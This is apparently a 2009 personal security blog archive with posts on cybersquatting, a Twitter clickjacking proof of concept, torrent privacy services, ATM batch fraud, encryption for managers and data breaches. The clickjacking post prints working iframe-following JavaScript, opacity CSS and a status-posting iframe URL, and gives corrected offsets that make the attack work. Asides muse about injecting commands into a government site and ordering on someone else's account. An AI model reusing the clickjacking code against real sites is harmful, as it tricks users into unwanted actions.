Thursday, February 26, 2009

Cyber-Squatters Suck


!Readers beware!


Thanks to RSnake for pointing this out to me...

Apparently some jerk cyber-squatted blogPspot.com ... notice the P in there. Now be careful if you're trying to reach this blog otherwise you may end up on a page you didn't want to go to.

I hate cyber-squatters.

WHOIS Information
Registrant:
Navigation Catalyst Systems, Inc
2141 Rosecrans Ave.
Suite 2020
El Segundo, CA 90245
Email:
Phone: 3106471592
Fax: 3106476001

Domain Name: BLOGPSPOT.COM
This is my favorite part... Server Info:

IP Address: 208.87.149.250 Whois | Reverse-IP | Ping | DNS Lookup | Traceroute
IP Location Bosnia And Herzegovina - Bosnia And Herzegovina - Constantin Servicos De Inf
Response Code: 200
Domain Status: Registered And Active Website

Stupid Wanks.

Wednesday, February 25, 2009

Latest ClickJacking Twitter Exploit vs. Browsers (IE, FireFox, NoScript)

Cool! Dan Goodin over at The Register picked this up too...

1:38pm - Update
- Interestingly enough, I finally took a peek as to why this wasn't working; the original writer of the 'sploit didn't have the mouse cursor positioned properly within the iFrame to click the UPDATE botton. {x- 40} and {y - 120} works perfectly :)

----

ClickJacking has once again come to Twitter! <-- Proof-of-Concept link

You've heard IT security folks talk about it, you've wondered what it really means, and maybe you've even seen the WebCam example of ClickJacking; but you're not really sure what the big deal is, right?

ClickJacking is a pretty nasty attack, and what's worse, your browser may not really help you much against the UI redress attack (as it was originally called). The problem here is that ClickJacking isn't a vulnerability or defect in a browser, rather, it's an attack against an HTML standard... whoops!

Today Twitter was abuzz with the latest (the 2nd one by my count) ClickJacking exploit in as many weeks, and it was interesting to see. I wanted to point out some interesting things in this exploit, and show some of the things that make these types of attacks dangerous. As a side effect, I took some screen shots of this exploit (and one RSnake mocked up for me) in different browsers just to see how things looked.

The original noggin.com page had very little opacity set up, meaning, the iFrame they're using doesn't disappear so it's not really an exploit per se. But RSnake's mock-up ratchets up the opacity on the iFrame so as to make it appear a little more dangerous... keep reading.

First, the noggin.com URL referenced above looks like this in Windows Vista/Service Pack 1/IE 7.0.6001.18000:

... you'll notice that it is essentially all white (strange how IE renders these), but some weird pop-up comes up asking you to save a file? Internet Explorer 7 obviously has some quirks here...

Next you can see what FireFox looks like on that same URL... naked (Vista/Service Pack 1 FireFox 3.0.6 with NoScript 1.9.0.6 (latest)):

See the difference? In IE all you saw was a white box around your cursor (that was the iFrame moving with your mouse) but in FireFox you'll notice that you see the actual iFrame displayed (still following your cursor dilligently).

The reason the iFrame follows your cursor is this piece of code:
[script type="text/javascript"]
function mouseFollower(e){
x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
var iframe = document.getElementById('iframe');
iframe.style.left = (x - 30) + 'px';
iframe.style.top = (y - 108) + 'px';
}
document.onmousemove = mouseFollower;
[/script]
Also, you'll notice if you look at the noggin.com page, that the opacity isn't really set very high:
iframe { position: absolute; width: 60px; height: 118px; z-index: 2; opacity: 0.5; filter: alpha(opacity=0.5); }
And of course, the page being framed in here is the twitter.com login page as so:
[iframe id="iframe" src="http://m.twitter.com/home?status=I+have+a+tiny+face%2C+do+you%3F+http%3A%2F%2Ftinyurl.com%2Ftinyface" scrolling="no"][/iframe]
Now... let's look at RSnake's mock-up with opacity turned up... a lot.

Here is what Internet Explorer sees when the opacity is turned up:


Now the same same page viewed in Firefox, with NoScript turned on... and you'll notice that you can barely see the iFrame this time (as opacity has been turned up) but when you click... ta-da....



So fundamentally... IE is broken somehow, some way - and it not only goes and dumps a white box instead of the actual iFrame (unsure why... need more looking) but the pop-up is perhaps due to something entirely unrelated to the clickjack attempt.


So... as a final though - use FireFox + NoScript... save yourself from strange things that go bump on the 'net.

CMS, URL *FAIL*

[Credit goes to Jeremiah Grossman for posting this up on twitter the other day...]

Some of us, those of us in IT Security, tend to look at the little things, for example the URL line when we browse around from site to site... and every once in a while we hit something like this:

http://www.house.gov/htbin/blog_inc?BLOG,tx14_paul,blog,999,All,Item%20not%20found,ID=090223_2687,TEMPLATE=postingdetail.shtml

There are just so many things wrong with this URL. First off, the part highlighted in red is interesting... "Item not found" ?? How odd, I wonder what the parameters for this are, and if it will take some nice system or SQL commands?

Now, of course being a .gov site I know they're monitoring it closely for hacking so I don't dare try and poke at this site, but it's hillarious. You can change the ID=xxxxxx_xxxx and depending on how good your guesses are you may get some other articles (maybe ones not yet set to publish?).

Anyway, you'd think the government would take security seriously, ... nevermind, I can't stop laughing.

Monday, February 23, 2009

BitTorrent goes stealth(BitTorrent + Privacy = TorrentPrivacy.com)

If you're worried about your ISP snooping on your BitTorrent downloads, or the RIAA or MPAA trying to sue you for that illegal movie/song download, there is apparently help. I've been doing a little research into this topic since I'm starting to become privacy-paranoid in my old age, and have found this little gem: https://torrentprivacy.com/.

I always do a little digging when I find something interesting so here are some interesting tidbits from their website and usability ...
  • TorrentPrivacy.com plays upon the fears of downloaders - they play up the "knock at the door" scenario and even readily post many of the current legal suits regarding music/movie downloading
  • Language like "Ensures no lawsuits against you" but doesn't actually have any assurance or insurance against law suits - either monetary or compensatory in any other way, that I could find
  • Claims to make BitTorrent 100% anonymous and safe
  • A group of developers from the Russian Federation runs this little endeavor
  • It costs money to join their BitTorrent "relay" network
  • They provide an automatically configured uTorrent client (package comes complete with ssh tunnel software + torrent client)
The way this software works is like this:
  1. You fire up the "package BitTorrentPrivacy Client"
  2. local encrypted Netcat ssl tunnel shell opens connection to either Europe, America, or Canada -based servers
  3. NetCat (nc) opens a listener on port 2222 and redirects it to the tcp/22 (SSH) tunnel it creates
  4. uTorrent connects to peers on port 2222 which then gets forwarded down thep pipe in an encrypted fashion
They have some interesting quotes in their FAQ section...

Do you keep logs?
No, we just do not have them. We are not obliged by any law to keep logs and we have disabled logging for all our services. In addition, we disabled the disk caching wherever possible, and regularly run maintenance scripts to delete temporary data and compulsory cache files.
Why should I trust TorrentPrivacy?
We're the group of independent developers well known to you by several Bittorrent projects such as: Torrentreactor.Net, Fulldls.Com, Bushtorrent.Com, Nutorrent.com. You can be sure that we're on your side! We know Bittorrent well - and we're ready to solve the problems of your privacy.
That's fascinating so I had to try it. As it says... I can verify the tunnel connects over to a server I pick, and I can grab a torrent (legal or otherwise) without showing my ISP that I'm downloading; except that they'll see a hugely active SSH connection to extremely active IP address.

What I find amusing is the assumption that your ISP won't notice you downloading torrents because you're not going to be connected to millions of peers and downloading torrent chunks. This just isn't true. All your ISP has to do is figure out that there are 3 IP addresses (or clusters) for the TorrentPrivacy servers; and match up SSH + large data streams and bingo. The only thing your ISP won't be able to tell is what you're downloading... but for some people that's worth the cost.

I think I'll just stick to legal downloads, easier that way... and it doesn't cost me anything or risk legal action.

Sunday, February 22, 2009

Banking's Achilles Heel

There is a perfect storm raging...
  • non-real-time banking/credit systems
  • global, distributed cash-access networks
  • near-depression global economy
  • collapse of financial markets globally
  • hackers contributing to organized crime
... when you add all those together you get one ugly situation. The recent fraud that was globally-coordinated was only possible because ATM systems, in certain places, operate on a non-real-time batch processing schedule. Having spent many years in a banking/credit institution I can say confidently that there are still many systems which are non-real-time, and the problem is not going to be going away tomorrow.

Have you ever taken money out at an ATM [automated teller machine] only to see it appear on your statement a few days, or maybe weeks later? What about making a debit card purchase that doesn't post to your account (or count against your balance) for days? How about purchasing something on your credit card that doesn't post against your account until the end of the next business day? Have you then wondered why these things happen?

The answer is this: banking and credit systems are still largely batch-processes. These systems depend for the most part on an end-of-day job that takes the sales for the day and sends them to a processor to post through. Sometimes, in certain cases where the merchant is low-tier, these batches don't happen for days or as much as a week!

While on a road trip a year or so ago, we stopped in a mountain restaurant in Southern Carolina... had lunch and bought some gas at the fuel station across the parking lot. When I got home the next day I tried to reconcile my checking account's available cash against purchases only to discover that the nearly $100 I had spent that afternoon hadn't made it to my account. In fact, that debit did not post to my account until 4 days later! This got me thinking...

No one will contend that recent hacker activity around credit card numbers and financial fraud has skyrocketed, and is only trending upward at an alarming rate. With the global financial crisis we can anticipate more losses and hack attempts in the world's financial and credit institutions. So why is this a bigger problem today than it was years ago?

The main reason is that financial systems like credit card processing are not real time; meaning, they do not instantly transfer the money you credit/debit against your account. In fact, as my story illustrates some of the less-developed areas within this ecosystem are very much laggards. These systems aren't going away, either. With banks on the brink of being nationalized there is very little chance that tomorrow we will all wake up to a financial system that has globally performed a rip-and-replace exercise on the technology underpinnings of the credit markets. In short, non-real-time batch processing of credit/debit is here to say for the forseeable future... this presents a glaring problem.

Take a scenario where hackers break into a massive treasure trove of credit account data (such as they did at Heartland Payment Systems, recently) and then create cloned cards which can be used at ATMs to withdraw cash or POS systems to make small purchases without raising any eyebrows. These criminals can then tap into a globalized organized crime network which can take the millions of compromised, cloned cards and strike simultaneously to withdraw massive amounts of cash before any bank realizes what just happened. Massive, coordinated fraud efforts like these are being perpotrated all around the world and it is very, very difficult to find them, and even more difficult to prevent them.

The only answer to attacks of this nature is a full conversion to real-time financial systems within our banking industry. Given the anemic condition most of these banks are, this is simply not a possibility. What makes this even more improbable is that a system like this would have to be cover over to in an all-or-nothing fashion. The bandage would have to be ripped off in one clean motion otherwise the pieces not attached to the new network would systematically begin to fail. Global credit processing failure would lead to an even more serious catastrophic event... but that's neither here nor there.

So you see, the banking industry has only itself to blame for the fraud it's being subjected to right now. Hacking happens, and no matter how PCI Compliant you are, how much money you've invested in preventative technologies they will not stop the determined human attacker who could be sitting in your call center harvesting card data about your customers right now!

So the ultimate rip-off? Finding an account that has a sizeable take, but not too big as to trigger special flags, and simultaneously withdrawing a good chunk of those funds from different global locations. By the time the different batch-oriented systems go to reconcile... you'll be [ $WithdrawAmt x SizeOfMob ] overdrawn and the criminals will have gotten away with it cleanly.

Will this achilles heel ever be fixed for good? It has to be. But only time will tell when... and how painful that transition will be. As for me, I'm going to keep using the cash I've been hording in my mattress.

Friday, February 20, 2009

A Business Analyst's Guide to Encryption

First, let's make sure everyone understands the topic; WikiPedia defines encryption thus:
In cryptography, encryption is the process of transforming information (referred to as plaintext) using an algorithm (called cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key.
Sounds pretty easy, right? Encryption is part of the practice of cryptography, defined like so:
Cryptography (or cryptology; from Greek κρυπτός, kryptos, "hidden, secret"; and γράφω, gráphō, "I write", or -λογία, -logia, respectively)[1] is the practice and study of hiding information
Broken down into the most simple explanation encryption is the process of hiding information whereby information that is humanly readable has some algorithm (or mutation) applied to it to it to make it meaningless without the secret key, which is usually a string of characters of some kind. The first and most early form of encryption is attributed to Julius Caesar, when information needed to be passed across a battlefield and had to be unreadable by the enemy in case it was intercepted. The code involved taking the alphabet and shifting it a certain number of positions to the right of left. If the key was R3, it meant that the letter a became a d, and the d became a g, and so on... thus you could write khoor and it would be translated back to hello. But enough history.

Modern cryptography involves creating a cipher that cannot easily be cracked by a computer, so extremely complex algorithms are applied, and tested against brute-force breakage. You've likely heard of some of the most common ones, namely 3DES, DES, AES and others. These are all of varying strengths, meaning, it takes varying degrees of computational capability (typically beyond the lifespan (usefulness) of the message) to crack the code and discover the message.

Now that you have a foundational understanding of cryptography, encryption and ciphers... let's address this all from a business angle. When you read regulations like PCI (Payment Card Industry) Standard, or HIPAA, or countless other industry-specific regulations which specifically call out information protection, you will read about encryption. Encryption is typically mandated, but it is rarely defined properly for implementation in the business context.

To be clear, there are two cases when you, the business analyst or project manager, will need to care about encryption:
  • Data in motion - This involves data moving from one place, to another, generally when data is being moved across systems. This data could be anything from pin codes, to IP addresses, to anything you can think of... on the wire, in transit, between two (or more) points. The reason this distinction is important is because data in motion is the most common type of encryption that is in use on the Internet. You may already know it... as SSL (or Secure Sockets Layer). SSL is the most common way that encryption is presented to users of systems, and presented as a security measure to safeguard information traveling from point to point across untrusted systems.
  • Data at rest - Data at rest isn't moving. While this may sound obvious, it means that it is currently being stored or manipulated by a single system, contained witin that closed system without traveling outside it. This type of data can be written to a USB key, in memory, or on a CD Rom. Data at rest doesn't have the threat of being intercepted when traversing a hostile segment, but it can be transported with the storage medium as in the case of a CD Rom.
Now that you understand those 2 very distinct types of encryption situations... think about which one generally gets used the most, and how extensively. I'm willing to be that when someone says encryption, the first thing you think of is SSL. SSL and that golden lock in the bottom-right corner of your browser immediately inspires trust that the information you're typing into your browser is secure.

WRONG.

All that means is that once you hit the submit button, the information (if encrypted properly) cannot easily be intercepted, and understood if plucked off the wire. Think of the likelihood of someone getting in-between the server you're connected to, and yourself. Think of how difficult it would be to slip-stream an intercept into that connection. Now think about your browser. Think about the browser you're typing your credit card into. Your precious information, as you type it, sits in that browser's memory in the clear, meaning anyone (or any thing) can read it.

So let's say you're on your favorite web site, buying your favorite book or widget. You look for that golden lock and once you see it you assume you're safe. You then diligently enter all your credit card information which your browser packages up, and sends across the internet in the clear. The sticking point here is that due to SSL Encryption, the tunnel the data passes along is encrypted. This does not mean your data is encrypted.

As an analogy, imagine you're sending a package using FedEx (or whom ever you like to ship with). Since you're shipping a letter that's super-secret you want it to be safe from prying eyes. If you were to use the physical equivalent of SSL encryption, you would put your letter in a metal box, put a lock on it and both you and the partner receiving the package would have a key. You're assuming the carrier wasn't going to pry open the box. But... ask yourself what if. What if that carrier pries open the box - your information is now able to be ready by anyone who wants to read it!

Now let's assume that rather than tackling that from a position of data in transit which you just did, you want to tackle the problem from a position of data at rest, meaning that you don't care if the letter is being moved or on your desk... you use a cipher to make sure that unless someone has the key they can't read it... even if they do pop open that lock while it's being transported.

Does this set off any alarms in the back of your mind? It should. Most businesses only tackle data security using the notion that data only needs to be encrypted while it's traveling... but this obviously doesn't account for the endpoints. So what if the data is safe as it travels along the tunnel between your server and your partner... what if your partner's server gets hacked and someone steals everything off that server. You just had your information stolen! If you had applied encryption to the data at rest then you wouldn't care!

What I am hoping to enstill in you is this: if you have the data you're safeguarding encrypted at rest it doesn't matter if you're using SSL or plain-text transfer, or if the information gets intercepted, or stolen... it won't be any good to anyone. Using SSL on your web servers and leaving your databases completely unencrypted is not just irrisponsible, but border-line negligent, given what you now know. All the SSL in the world won't protect your database (with precious customer data) should someone hit you with SQL Injection and steal all the information right through your web application.

So let's review... we have data at rest, and data in motion. If you're already using encryption for data at rest, then things like SSL and encryption for data in motion is just icing on the cake... make sense?

ENCRYPT YOUR DATA AT REST
(in your databases, flat files, on disks... otherwise...)

Thursday, February 19, 2009

Got <3 for this Blog?

Do you <3 this blog? If the answer is yes, then go vote!

---> http://www.socialsecurityawards.com

I would love to get your vote...

Also, if you happen to read my other, HP-inspired blog Following the White Rabbit, you could nominate that one for the vendor-related blog...

kthxbye

:)

Wednesday, February 18, 2009

Surviving a Depressed Economic Situation...in security

The signs are everywhere; Wall Street has fallen into deep recess, consumers aren't buying, houses aren't being built or sold, and criminals are breaching companies at an alarming rate. The economic conditions of today's reality combined with the need to continue to survive financial has thrown gasoline on the hacking fire in recent weeks.

Whether you're looking at the intrusions and catastrophes at Heartland Payment Systems (HPS), SRA International, or the Wyndham Hotels - the writing is on the wall. Actually, it's no longer writing on the wall, it's a flashing neon sign over the freeway - "Criminals Are After You". It's only a matter of time before your web sites, applications and precious databases are infiltrated and bled dry for every drop of information.

The problems that are going on outside your corporate walls aren't any better internally. Insider fraud continue to mount in this type of depressed economy, just wait until someone in one of your call centers starts to skim credit cards and cardholder information... there is nothing you can do about it. The scary thing is that you, as the security leader, couldn't prevent this problem even if you had any money left in your budget. Criminal Organizations (read: the mob) have figured out that sometimes, rather than employing expensive hackers, they can simply find an internal employee who's willing to be pushed over the edge for a payout and commit that next big insider crime. Let's face it, you have to trust at least *some* of your employees... right?

At least security companies are here to help you. At least anti-virus companies are there as your rock in hard times - oh, wait... they're not. BitDefender, Kaspersky, and Trend Micro join the expanding list of security companies that have been infiltrated lately. When will it all stop?

Now the Washington Post is reporting that GovTrip.com (the travel site for Federal employees) has been hacked as well to redirect visitors to a site that served up malware, how cute. There is no stopping the attackers, the criminals who are organizing at alarming rates. The FBI can't even track them let alone catch them anymore - there are simply too many, they're too organized, and they're too smart.

If you're the CISO, Security Manager, or whatever your security-related role in your business you have to be looking at the news with your head in your hands. I know I am. It is time to raise the white flag? There seems to be a perfect storm of sorts that has come to our doorstep looking for attention. The economic crisis has created a situation which reads like from a horror novel, for us security folks.

The contracting economy is breeding more criminal activity, while at the same time shrinking budgets. Combine those two together with the fact that there are more disgruntled employees than we've seen in a long, long time - and you get a situation that's nearly impossible to survive unscathed. Data breaches, hacks, and break-ins are being reported daily... but I'm going to offer you hope after tearing down your morale. Here it is...

First off, remember that now is not the time for pet projects - now is the time to get real. If you're lucky enough to work within an organization that actually understands the value of security you have a leg up on everyone else, if you don't work in one of those organizations ... wait a few weeks until you're hacked and then approach the subject again. The bottom line is this - there are risks inside your company that will simply go unmitigated, you'll have to pick your battles. This is one of those rare times when security leaders with great intelligence, vision, and understanding of business shine and accel. Everyone else looks for a new job to fail at.

Part of being real is understanding that ther are some immediate needs that require a security dollar, and there are some that simply don't fit on the to-do list until things calm down. I've started a list here, for your reference... please feel free to contact me or comment to add to this list.

These are some of the ways you can survive, as the security leader of your business...
  1. Forget pet projects... you won't have money, manpower, or time
  2. Focus on your business's core money-making activities, secure those as well as you can
  3. Use the shelfware you bought but haven't opened the shrink-wrap on yet
  4. Employ automation (yes, this means tools too) to make your small team as efficient and far-reaching as possible
  5. Pick your battles - understand that sometimes the answer is "We'll simply accept this risk"
  6. Review your employees; make sure you have someone that covers every necessary [read: relevant] aspect of security
  7. Look for outside help - services organizations are your friend because it means you get to spend operating budget (OpEx) and not capital budget (CapEx) - huge difference
  8. Rely on your peers for advice; there is no need to fail in their footsteps
  9. Trusted consultants are like gold - they're rare but can provide you with information across industries, business practices, and historical context... they may be your salvation
  10. Document mitigated risks; you'll need to make sure you document in great detail what you're doing, why, and how much it's costing... in case you ever have to explain to your board why you got hacked.
Good luck, and get yourself a life vest and a helmet... it's going to be a rough ride.

Heartland Payment Systems - Fallout Hits Alaska

It's official, the Heartland Payment Systems fallout has hit every corner of the United States (and beyond). Alaskan banks are now feeling the pinch, in what could be yet another nail in the HPS coffin. I don't like to call a ToD before the patient is cold - but this time I think it's rather obvious that HPS won't be making it through this cataclysmic event. Looking at the sheer numbers... just from Alaska:

  • Alaska USA Federal Credit Union reissued 64,000 debit cards and 6,000 credit cards to customers in Alaska and western Washington state
  • First National Bank Alaska reissued 1,150 credit cards and 7,000 debit cards
  • Credit Union 1 reissued 1,121 credit cards and 7,135 debit cards
  • Denali Alaskan Federal Credit Union reissued more than 5,000 credit and debit cards

By my count, using these rough numbers we're looking at... ~91,406 cards re-issued throughout Alaska.... so far. Let's dig deeper into the numbers... just based off this latest Alaska-based article.
  • 1 out f every 5 First National Bank, Alaska customers had their card compromised - that's actually pretty high when you consider that HPS is estimating (and I'm guessing convervatively) on the number of compromised accounts... because they obviously have no idea
  • The cost of re-issuing a card (at least at First National) is about $5/card
  • ~91, 406 x $5 = $457,030 (by conservative extension --> 100,000,000 x $5 =
Keep in mind these numbers are a conservative estimate and many banks aren't re-issuing cards unless they actually see fraud on some major portion of that population. While that may be a high-risk activity, it is clear that the banks are taking these risks because re-issuing cards is both bad for PR, and very expensive.

So as the numbers mount, and the dollar-cost of this breach piles up - you have to wonder what, if any controls could have prevented this catastrophe? If we take it as a high-probability that this wasn't just some random virus and it was indeed targeted malware... what could being PCI compliant have done to prevent this? (the answer is likely nothing). Also... what are banks, credit agencies, card processors and other financial institutions doing now that they see the consequences of a breach staring them in the face?

I wonder. Here's something interesting...

Wells Fargo Bank, Northrim and KeyBank officials wouldn't say how many cards they've reissued due to the security breach.

Unlike other banks and credit unions in Alaska, KeyBank isn't notifying customers whose card data may have been breached unless the bank notices suspicious activity on those accounts.

Instead, "We have ramped up our fraud monitoring," said Anne Foster, a regional spokeswoman for KeyBank, which has 17 branches in Alaska.

She said KeyBank will reissue cards to customers who request it, and will immediately notify customers of any suspicious charges, but the company is trying to avoid customer anxiety and extra expense to people who haven't actually been harmed. So far, there's no evidence that KeyBank customers' card data has been used fraudulently as a result of the breach, she said.

KeyBank is the primary sponsor bank for Heartland. That means that KeyBank registers Heartland with Visa and Mastercard to provide payment processing services. Heartland must have a sponsor bank in order to do business with Visa and MasterCard.

... I wonder how long that KeyBank - Heartland Payment Systems relationship will last now that HPS is going down as the largest (and arguably most expensive) data breach in history...I wonder.

More here...http://www.adn.com/news/alaska/story/693570.html

Tuesday, February 17, 2009

FaceBook's Big Problem

FaceBook, and many other site/applications just like it, has a huge problem.

I've argued before that the enemy of security is complexity (and by extension, extensibility)... so it should be no surprise that FaceBook's biggest problem now is the countless plug-in applications that live in its ecosystem. Plug-in applications (or applets) that rely on the FaceBook API to do simple things like keep state, or interact with Beacon for the average user are indistinguishable from the main FaceBook application... and that's a problem as well.

While the FaceBook.com staff may be doing a relatively good job of keeping their code bug and exploit-free, the same cannot be said for the countless applications that plug into the FaceBook framework. These applications, after all, have their own databases, data source/sinks, and control paths independent of FaceBook, but in the final result cannot stand alone. A recent post to my blog and another blog about a "SQL Injection attack on FaceBook" is not actually an attack against FaceBook at all, but simply against an application off-shoot from the FaceBook.com framework... and while that application is full of SQL Injection goodness [or badness, you decide] this does not necessarily reflect on FaceBook.com itself... or does it?

The issue of extensibility of an application is one of function vs. security... and is an age-old battle. On one hand, FaceBook (and others like it) have the need to extend themselves beyond their own means to incorporate community add-ons that make their platform more attractive. On the other, they realize that by doing this they are stripping the very security features which they depend upon right off... Transferring control to a 3rd party application within the framework of your own application is a scary thing. The delicate balance between extensibility and security is like the dance of death between the cobra and the mongoose... Each, on their own merits, is more important - but when juxtaposed they are like a collission between the unstoppable force and the immovable object - something has to give. [OK, I swear I'm done with metaphors]

The $1Bn question is, where does extensibility bleed out into security hazard and what formula would one use to strike the appropriate balance. While I may not have the exact formula [yet], I would like to offer the following components...

Risk = 1 / (Value[e] - Hazard[e] ) {value != hazard, value > hazard} as {Risk --> 0}

Think of extensibility of a framework/API such as FaceBook as a component of both value & hazard at the same time, because extensibility adds to FaceBook's overall value, but it also increases the hazard. Interesting, right?

Best. Hack. Ever.

In what is perhaps the best, and most creative, "hack" ever, someone managed to hack into the drive-through radio system at a Taco Bell in Sedalia, MO... and berate drive-up customers.

"Quite a few Taco Bell customers probably wanted to run away from the border this week!

Someone hacked into a Taco Bell drive-through radio system in Sedalia, Mo. and then shouted obscenities at consumers, ABC15.com reported.

ABC15.com also reported:

Authorities are speculating that for the hackers to have interfered with the radio frequency, they must have been nearby the Taco Bell.

Taco Bell employees plan to press charges if the pranksters are found."[SRC: NY Daily News]

Monday, February 16, 2009

Wyndham Hotels Victim of Hackers

It's just February 16th, but already the data breaches from this year have reached epic proportions. We've already had a for-the-record-books data breach in Heartland Payment Systems which is being class-action sued [thrice!], and by one of the legal firms [ Berger & Montague ] which beat up on TJX in court (awesome, go get 'em!). Now, Wyndham Hotels has announced that anyone who's stayed at one of their hotels should be checking their credit card statements... really? How many credit monitoring offers can one person handle? I know I've personally gotten 5 (at least, I lost track) in the past year...

Let's take a step back, just for a second. At what point do all these data breaches drop into the background noise of the news? I am rather excited that this type of news still makes the front pages but at some point it's going to start becoming "yet another data breach story"? Or am I wrong?

All these companies should be ashamed of themselves, from a PR perspective at least, but there are consequences, aren't there? We, the consumers, keep hearing the "check your credit statement" line so often ... I don't know about you but I already look at my credit card statement online daily - it's just something I've learned to live with. I'm afraid the news will eventually (in the near future) lose its sting.

What do you think?

200 - w(_)w

Hey Readers... I firmly believe that a person is only as relevant as the company they keep and as I type out my 200th post here on PreachSecurity, I'd like to say thank you, to all of you, the readers.

Over the past year+ you've made this blog an adventure, and with your comments and suggestions it's gotten to a respectable level of readership... and with the honest and constructive feedback I'd like to think I've achieved something here.

Now- I need your help, and want feedback again. I'd love to hear what you want to read about, over the next year or so. Is there a favorite topic you read on here? Do you have a favorite rant, or commentary you'd like me to expand on?

Here's your chance ... let's hear what you've got to say!

If it holds true that a man is only as relevant as the company he keeps - then I feel great knowing I've got some very active readers, thinkers, and colleagues. See you soon!

HSN: Simple Shopping? or Security Hole?

... a quick comment on something that troubles me.

I ordered something on Home Shopping Network (don't ask...) and when the operator was done taking my order she said something that intrigued me.
"Next time, sir, all you have to do to place an order using our automated
system is give your phone number."

Wait, all I have to do is call their phone system, give a phone number and order something? Now, I'm tempted to try and call, and order something for someone else. Who has an HSN account they're willing to try this with? {evil grin}

Friday, February 13, 2009

Identity Theft: Victimizing the Dead

Dead people, I've learned, make great identity theft victims.

Around November 2007 or so I did some investigative work with a colleague of mine at a place here in Chicago that is essentially a chop-shop for cadavers. Without naming the place, I can tell you that if you ever donate your body to science, and you happen to live in this area... this is where you'll be going.

Anyway, the body parts all over the place wasn't the problem... the information theft was. Apparently someone had broken in and taken some records, digitally of course, from a database that housed everything from your social security number, to your next of kin, your medical history (obviously relevant), your drivers license number, home address... you get the picture. The point is that this database was inside a home-grown application, on MS-Access, and pretty much open to the world. Forensics on this box were going to be nearly impossible given the Windows version, and extremely open nature of the box...

So after determining there was nearly nothing we could do to determine the attacker (of thief) we nuked the box, and built a new one which had some security controls, a firewall, etc... but that got me thinking.

Dead people really would make the best identity theft victims, assuming you can get past the "hey, you're listed as dead according to your credit agency report" part. Given that things are a little chaotic in the credit industry... I wonder how much of this is going around? Furthermore, with the amount of chaos inside the organization (not-for-profit) one can only wonder how many more of these there are around the country and what information they're bleeding (no pun untended)...

Wednesday, February 11, 2009

Risk: The Ultimate Metric

Many years ago, back when the world was young and IT was innocently going about troubleshooting DOS 3.3machines and setting up those brand-new 300b modem banks, risk meant something entirely different than it does today. Back then, risk was an entirely business-owned term. Risk dealt with one of the following, and only under rare cases was it anything more:
  1. Financial: related to credit or investments such as loans, credit cards, or other financial obligations
  2. Legal: dealing primarily with breaking the law, whether local, federal, or international
  3. Human: accounting for the human element of a corporation, mainly HR-related
  4. Opportunity: taking a risk or pursuing an opportunity which could positively or negatively impact the business
Now in 2009, we look at risk as a metric applied to technology. While there are actuarial models for quantifying the 4 previously-mentioned risk types we are still falling short at being able to measure technology-based risk. This can be understood largely by the historical view of things, given that the 4 other types of risks identified here have been around for centuries and are reasonably well-understood and refined through the ages, whereas technology-based risk has been measured for somewhere less than 20 years. This makes it pretty easy to understand why your auto insurance company can tell you what risk profile you fall into after asking you just a few simple questions and what your loss-expectancy is; and you still have no idea how to tell your upper-management what the likelihood of getting hacked if {insert security counter-measure here} gets implemented.

Risk is truly the ultimate metric for security practitioners and managers alike. We've tried to model risk with equations, formulas, and frameworks over the past half-decade or so but we're still failing to fundamentally provide consistent answers to the same question.
"How much less likely are we to be hacked if we spend $X dollars on Y solution?"
Your insurance company can tell you how much less likely you are to cost them money if you're a married male over the age of 25, versus an unmarried male under 25... but we in security have no such magic table of risk to speak from.

As I've stated, I know full-well there are some great risk model frameworks and formulas out there but at the end of the day... I don't know a single one that can answer the question, posed above. Is it because every business is different? Maybe it's because there are more factors than we can possibly factor into a cohesive formula and keep sanity... or maybe it's just that we simply don't understand risk in technology terms completely.

Take a look at your 2009 projects (if you have any, given the economic climate) and ask yourself... which of these reduces the business' risk profile the greatest, and by how much? I urge you to abandon trying to word-smith your projects into something your CIO will find acceptable (or at least scary) and focus on trying to come up with that all-important metric... risk. Instead of justifying your pet project by saying it will keep your company from making negative front-page news or losing millions of credit card records... Justify that project by saying that implementation of that project will decrease negative business risk by 20% (or whatever your number is)... and watch the reaction.

... now all you have to do is figure out that magic formula. Good luck.

Tuesday, February 10, 2009

Hacker Losses for 2008 at $1Trillion

... and 2009 is just getting warmed up...it's only the second week of February!

According to this story on the front page of Yahoo! today, $1 Trillion dollars worth of data loss was perpetrated in 2008. That is more than the current spending bill...erm, "stimulus bill" being proposed by Pres. Obama. That kind of money is staggering... and now it's making the front pages.

A quick recap of the two biggest events so far yields Heartland Payment Systems (HPS) and SRA International have both lost staggering amounts of cardholder records and will in all likelihood be forced out of business due to losses, law suits, and fines. There seems to be more hacks every day that continue to pile up, and the numbers seem to pile up faster as the world economic condition struggles to stave off global depression. Obviously organized crime has found a way to thrive in these dark times; so remember that your employees are even more vulnerable to orgnized cime "temptations" for insider crime.

The atrocities at SRA and HPS, if you analyze them rationally, could not have been perpetrated by a "virus"; but are most likely the victims of custom-created malware which was seeded by an insider. As things get worse the insiders, those employees terrified about losing their jobs - will be your greatest enemies.

Think carefully before cutting those security dollars and spend on security programs, lest your business be the next victim in the $1 Trillion+ loss-pile for 2009.

Yemen Releases 170 Al-Qaeda Suspects

The headline reads "170 Al Qaeda Suspects Released in Yemen" which isn't a real shock when you consider that Al Qaeda has announced that it has made Yemen it's middle-east base of operations... and the central government has very little control of the actual country.

What really drew my ire and utter shock was this snip...
"The men were freed Friday and Saturday after signing pledges not to engage in terrorism — a strategy the Yemeni government has often used with those suspected of fighting in militant causes abroad. Local tribal leaders are also expected to guarantee the good behavior of the released."

... which I found to be absolutely ridiculous. Suspected terrorists were released because they signed a paper that says they won't do bad things like kill people?

That didn't even work for me back in grade school, and I was only in trouble for talking in class! These animals are suspected terrorists, which I admit has the word "suspect" in it... but unless Yemen is in the business of arresting random people, I figure has some truth to it.

Shame upon the house of the idiot(s) who thought this one up.

Monday, February 9, 2009

Parking Meter Fail?

Spotted during this past year's CSI Conference in National Harbor, MD...


Titled: Parking Meter Fail

(2FA) Strong Authentication ... and open source

As many of you readers know, I've always been an advocate of "more-than-a-simple-password" authentication, so when I had the opportunity to speak with Nick Owen from Wikid Systems I took it. Nick had some interesting things to say about his company's market-space, and the need for stronger authentication, so here's some highlights from that interview.

First, here's Nick's take on his company's background and market-purpose.
Nick: "We provide strong authentication solutions. We support an open source and an enterprise version. We're really the only open source solution with a company standing behind it. That allows us to leverage the open source world but also provide a strong, supported product at a reasonable price and since authentication is so "inline" it's important to have it supported."
